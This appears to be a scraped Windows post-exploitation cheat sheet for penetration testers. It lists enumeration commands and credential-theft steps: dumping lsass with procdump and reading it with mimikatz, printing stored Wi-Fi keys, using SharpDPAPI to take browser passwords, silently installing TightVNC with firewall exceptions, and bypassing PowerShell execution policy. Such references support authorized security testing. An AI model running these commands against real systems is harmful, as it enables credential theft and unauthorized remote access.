General
Check for additional drives
Copy get-psdrive //powershell
show_mount // meterpreter
wmic logicaldisk get name | caption //wmic
Seatbelt MappedDrives // seatbelt List installed programs
Copy reg query HKEY_LOCAL_MACHINE \S OFTWARE
reg query HKEY_LOCAL_MACHINE \S OFTWARE \W ow6432Node \M icrosoft \W indows \C urrentVersion \U ninstall Check linux subsystem
Copy C:\Users\<name>\AppData\Local\Packages\CanonicalGroup... Search writeable directories
Search files by name
Search Files by content
Copy findstr /s /i < needl e > *.* Search Files by owner
Copy dir c: \* .* /S /Q | FIND /i "owner" Search files in meterpreter
Search for alternate data streams (ads)
Check named pipes in PowerShell
Copy [System.IO.Directory]::GetFiles( "\\.\\pipe\\" ) Grep file contents in PowerShell
Copy Select-String -Path < pat h > -Pattern < patter n > | out-host -paging Enumerate SMB
Copy smbmap -R -H \\ < i p >
smbclient -L \\ < i p > -N
smbclient \\ < i p > \s hare -U < use r >
smbget -R < i p > Grant permissions with icacls
Copy icacls < filenam e > /grant < usernam e >( OI ) ( CI ) F /T Search registry
Copy reg query HKLM /s | findstr /i < ite m >
reg query HKCU /s | findstr /i < ite m >
reg query HKLM /f < ite m > /t REG_SZ /s
reg query HKCU /f < ite m > /t REG_SZ /s Print wlan keys
Copy netsh wlan show profile < nam e > key=clear PowerShell port scan
Copy 0..65535 | % {echo ((new-object Net.Sockets.TcpClient ).Connect( "<ip>" ,$_ )) "Port $_ is open!" } 2> $null Get User SID
Copy [wmi] "Win32_userAccount.Domain='client',Name='Administrator'" Deploy TightVNC
Copy msiexec /i "tightvnc.msi" /quiet /norestart ADDLOCAL="Server,Viewer" VIEWER_ASSOCIATE_VNC_EXTENSION=1 SERVER_REGISTER_AS_SERVICE=1 SERVER_ADD_FIREWALL_EXCEPTION=1 VIEWER_ADD_FIREWALL_EXCEPTION=1 SERVER_ALLOW_SAS=1 SET_USEVNCAUTHENTICATION=1 VALUE_OF_USEVNCAUTHENTICATION=1 SET_PASSWORD=1 VALUE_OF_PASSWORD=PASSWORD SET_USECONTROLAUTHENTICATION=1 VALUE_OF_USECONTROLAUTHENTICATION=1 SET_CONTROLPASSWORD=1 VALUE_OF_CONTROLPASSWORD=PASSWORD Grep Registry for Keywords:
Copy reg query HKLM /s /f <keyword> (try HKLM/HKCU) Find Files by Date
Copy forfiles /P C: \ /S /D 10 /24/2020 /C "cmd /c echo @PATH" Bypass Execution Policy (for domain users) by changing registry as local administrator
Copy HKLM:\Software\Policies\Microsoft\Windows\PowerShell # change value to bypass Useful Commands in Rpcclient
Copy rpcclient -U < use r > < i p >
lookupnames < nam e >
lookupsids < si d > Dumping Processes
Copy procdump.exe -accepteula -ma < pi d > We can also use a short custom program to avoid using procdump.
If we dump lsass, this dump can be read using mimikatz:
Copy sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords Credentials
Check for stored credentials:
Company Files
This lead to success on numerous occasions. While not technical make sure you look at the files that are on the system. This includes configuration backups, documents, notes, technical documentation and more.
Invoke-PrivescCheck
Great Script to collection information about the host and possible EoP Paths.
Seatbelt
Good Host Enumeration Tool: https://github.com/GhostPack/Seatbelt .
Copy Seatbelt -group=all -full SharpDPAPI
Get Passwords from Chrome & Windows via https://github.com/GhostPack/SharpDPAPI .
Check for running services
Copy sc query
sc query <>
sc qc <>
reg query HKLM \S YSTEM \C urrentControlSet \S ervices SMBClient
List Shares
Copy smbclient -L \\<ip> -U anonymous Connect to Share
Without credentials:
Copy smbclient \\server\\sharename -U "" -N With credentials:
Copy smbclient \\server\\sharename -U domain\user Other
Usually you want to run the scripts/tools from the Privilege Escalation Section. Other than that these are interesting as well:
